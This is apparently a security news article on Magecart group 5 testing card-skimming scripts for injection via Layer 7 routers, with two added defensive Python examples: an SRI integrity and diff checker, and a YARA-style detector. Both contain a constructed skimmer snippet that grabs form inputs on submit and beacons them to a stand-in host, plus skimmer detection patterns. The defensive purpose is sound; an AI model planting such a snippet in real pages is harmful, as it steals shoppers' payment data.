
New Skimming Trend: Injecting Malicious Scripts into Routers

Cybercriminals appear to be working on a new way to steal payment card data. According to IBM security researchers, a group of hackers is currently developing malicious scripts to use against commercial-grade Layer 7 (L7) routers.

This would entirely change the methods seen in skimming attacks such as Magecart, as up until now the malicious code used by hackers was delivered at website level via JavaScript or PHP files. Changing the attack surface can be regarded as an evolution in Magecart-powered attacks.

First of all, let’s see what exactly a Layer 7 router is. It is a commercial, heavy-duty router typical of large networks, government networks included. What sets it apart from other routers is that a Layer 7 device can inspect and manipulate traffic at the application layer (Layer 7) of the OSI networking model. In other words, the router can act on traffic not only according to IP address but also according to cookies, domain names, browser type, and so on.

So, what did IBM researchers uncover in their analysis?

The team has identified malicious activity which they attributed to the Magecart 5 cybercriminal group. The research shows that the Magecart hackers are “likely testing malicious code designed for injection into benign JavaScript files loaded by commercial grade Layer 7 routers, routers that are typically used by airports, casinos, hotels and resorts”. The analyzed attack scenario reveals that an attack against this type of router can allow malicious ad injection as well as access to other parts of the compromised network.

How would an attack against L7 routers happen?

These attacks are based on the idea that attackers would leverage L7 routers and abuse their traffic manipulation features to inject malicious scripts into the active browser sessions of users. In fact, IBM says that the Magecart group recently injected malicious code into an open source mobile slider module:

MG5 typically uses JavaScript and has likely injected its code into a JS library served to mobile app developers. That open source code is provided as a free, MIT licensed tool designed to provide swiping features on mobile devices. By infecting that code at its source, MG5 can infect and compromise all the apps that incorporate that module into their code and steal data from users who eventually download the booby-trapped apps.

Moreover, the scripts the researchers got hold of appeared to be specifically created to extract payment card details from online stores and upload the harvested information to a remote web server. It is curious to note that the scripts were uncovered because the attackers uploaded the files to VirusTotal, which was perhaps done for testing reasons, to see whether the code would be detected by antivirus engines.
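The two paragraphs above describe code being altered in transit by a traffic-manipulating device and a script that harvests form data and posts it to a remote server. The defender's counterpart is to verify that the JavaScript a client receives is byte-for-byte the version the site published. The following Python example is added here and is not code from the article or from IBM's report: it computes a Subresource Integrity (SRI) value for a known-good file, rejects a served copy that does not match, and uses a diff to pull out the lines that were added so an analyst can look at the injected part first. Both JavaScript samples are constructed for this illustration, and `example.invalid` is a reserved, non-resolving host name.

```python
"""Added example (not from the article or IBM's report): detect in-transit
modification of a JavaScript library by checking it against a known-good
hash, then isolate the injected lines. All sample content is constructed."""
import base64
import difflib
import hashlib
import hmac

# Constructed known-good library, standing in for any third-party JS module.
KNOWN_GOOD_JS = b"""/* swiper-lite v1.0 (constructed sample) */
function initSwipe(el){el.addEventListener('touchstart',function(e){el.dataset.x=e.touches[0].clientX;});}
"""

# Constructed tampered copy: the original with a block appended that collects
# form input and posts it to a remote host (example.invalid never resolves).
TAMPERED_JS = KNOWN_GOOD_JS + b"""
document.addEventListener('submit',function(e){var d={};
for(var i of e.target.querySelectorAll('input')){d[i.name]=i.value;}
navigator.sendBeacon('https://example.invalid/collect',JSON.stringify(d));});
"""


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the Subresource Integrity value ("sha384-<base64>") for content.
    Publishing this in <script integrity="..."> makes browsers refuse to run
    a copy whose bytes differ from the one the site hashed."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(served: bytes, expected: str) -> bool:
    """True only if the served bytes hash to the expected SRI value.
    The algorithm is taken from the prefix of the expected value."""
    algo = expected.split("-", 1)[0]
    return hmac.compare_digest(sri_hash(served, algo), expected)


def injected_lines(known_good: bytes, served: bytes) -> list:
    """Lines present in the served copy but absent from the known-good copy.
    Blank added lines are dropped; what remains is the injected payload."""
    a = known_good.decode("utf-8", "replace").splitlines()
    b = served.decode("utf-8", "replace").splitlines()
    return [line[2:] for line in difflib.ndiff(a, b)
            if line.startswith("+ ") and line[2:].strip()]


if __name__ == "__main__":
    expected = sri_hash(KNOWN_GOOD_JS)
    print("published SRI:", expected)
    print("known-good copy verifies:", verify_integrity(KNOWN_GOOD_JS, expected))
    print("served copy verifies:    ", verify_integrity(TAMPERED_JS, expected))
    for line in injected_lines(KNOWN_GOOD_JS, TAMPERED_JS):
        print("injected:", line)
```

One caveat: an SRI attribute only helps when the HTML page that carries it reaches the browser intact, so it complements TLS rather than replacing it; a device that can rewrite a plain-HTTP response could also remove the attribute. The hash comparison itself is still useful server-side and in monitoring, where a periodic fetch of a third-party script from different networks can be compared against the published value.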

IBM discovered 17 such scripts, and grouped them in 5 sections according to their purpose.

Related: Magecart Hackers Insert Skimming Code Into a Third-Party JavaScript Library (https://sensorstechforum.com/magecart-skimming-code-javascript-library/)

Researchers Looked into YARA Rules

The researchers looked into YARA rules (a tool that enables a rule-based approach to describing malware families based on textual or binary patterns) and IOCs (indicators of compromise) associated with Magecart group 5 activity. A VirusTotal alert from one of the analyzed YARA rules initially identified two unobfuscated file samples that were very similar to samples shared in previous analyses of Magecart activity.

The experts noticed that these two samples, which shared a common naming convention, were identified as JavaScript skimming code. The recurring file naming convention, where the string “test4” repeated, also came from the same uploading member and source location in Murino, Russia, the report says.
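The paragraphs above describe how pattern-based YARA rules flagged unobfuscated skimming scripts. The Python example below is added here and is not part of the article or of IBM's research; it implements a small rule engine in the spirit of a YARA rule, with named string patterns and an "N of them" condition, and runs it over two constructed JavaScript samples. The indicator patterns are illustrative choices made for this example, not rules from the report: each one is common in legitimate code on its own, which is why the condition requires several to fire together.

```python
"""Added example (not from the article or IBM's report): a YARA-style rule
engine, in plain Python, that triages JavaScript samples by counting how many
named indicators of form harvesting plus exfiltration appear together.
Patterns and samples are constructed for illustration."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    strings: dict            # identifier -> regex, like YARA's strings section
    min_matches: int         # YARA-style condition: "min_matches of them"


# Illustrative indicators. Each alone is innocuous; together they describe
# "hook form submission, read every input, serialise, send somewhere".
SKIMMER_RULE = Rule(
    name="js_formgrabber_like",
    strings={
        "$card": r"(?i)(card\s*number|cc[_-]?num|cvv|cvc|expir)",
        "$inputs": r"querySelectorAll\(\s*['\"]input",
        "$exfil": r"(sendBeacon|XMLHttpRequest|fetch)\s*\(",
        "$submit": r"addEventListener\(\s*['\"]submit['\"]",
        "$encode": r"\bbtoa\(|JSON\.stringify\(",
    },
    min_matches=3,
)

# Constructed benign library: touch handling plus a config fetch.
BENIGN_JS = (
    "function initSwipe(el){el.addEventListener('touchstart',"
    "function(e){el.dataset.x=e.touches[0].clientX;});}\n"
    "fetch('/config.json').then(function(r){return r.json();});\n"
)

# Constructed suspect sample: collects inputs on submit and beacons them out
# (example.invalid is a reserved, non-resolving host name).
SUSPECT_JS = (
    "document.addEventListener('submit',function(e){var d={};"
    "for(var i of e.target.querySelectorAll('input')){d[i.name]=i.value;}"
    "navigator.sendBeacon('https://example.invalid/collect',JSON.stringify(d));});\n"
)


def scan(rule: Rule, content: str) -> list:
    """Identifiers of the rule's strings that occur in content, in rule order."""
    return [ident for ident, pat in rule.strings.items() if re.search(pat, content)]


def matches(rule: Rule, content: str) -> bool:
    """Apply the rule's condition: at least min_matches strings must be present."""
    return len(scan(rule, content)) >= rule.min_matches


def triage(rule: Rule, samples: dict) -> dict:
    """Map each sample name to (verdict, matched identifiers) for analyst review."""
    return {name: (matches(rule, body), scan(rule, body)) for name, body in samples.items()}


if __name__ == "__main__":
    for name, (hit, found) in triage(SKIMMER_RULE, {"benign.js": BENIGN_JS,
                                                     "suspect.js": SUSPECT_JS}).items():
        print(f"{name}: {'MATCH' if hit else 'clean'} {found}")
```

The count-based condition is what keeps the false-positive rate tolerable: a library that only calls `fetch` scores one indicator and is left alone, while the suspect sample scores four. In a real deployment the same structure is written as a YARA rule and fed to the scanning pipeline, but the logic of naming the strings and thresholding on how many co-occur is exactly what this small engine does.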

What can users do to prevent these attacks?

Unfortunately, there’s not much a user can do to circumvent an attack at the router level. The only certain thing is to avoid shopping from suspicious online stores or public networks, like the ones in hotels, malls, and airports. Nonetheless, shopping from home also poses risks.

There’s still hope, as security researchers have been recommending something called a virtual card. With this approach, the user gets a single-use card number that is valid for one transaction only.

What is a virtual card? It is a prepaid credit card, which enables shopping freely online. The virtual card only features a number and doesn’t have a physical carrier. With this card users can rely on the security and protection of their online payments.

This means that even if the card number is used on a dangerous website, the card number is useless once the transaction is completed. The disadvantage of the virtual card is that it is still not widely available to users worldwide, and it may not be easy to get one.

The change in tactics of Magecart hackers in their skimming operations is not that surprising, as attacks at router level are not unseen. Insecure routers have been targeted in many attacks, such as phishing, cryptomining, and malware downloads.

In short, router security should not be overlooked. To keep the router safe, first check whether a wireless security key (the Wi-Fi password) is configured at all. If you have not set up a key, you can do so from the wireless security setup page in the router’s administration interface. There are other router security tips that you should consider applying as well.

Milena Dimitrova
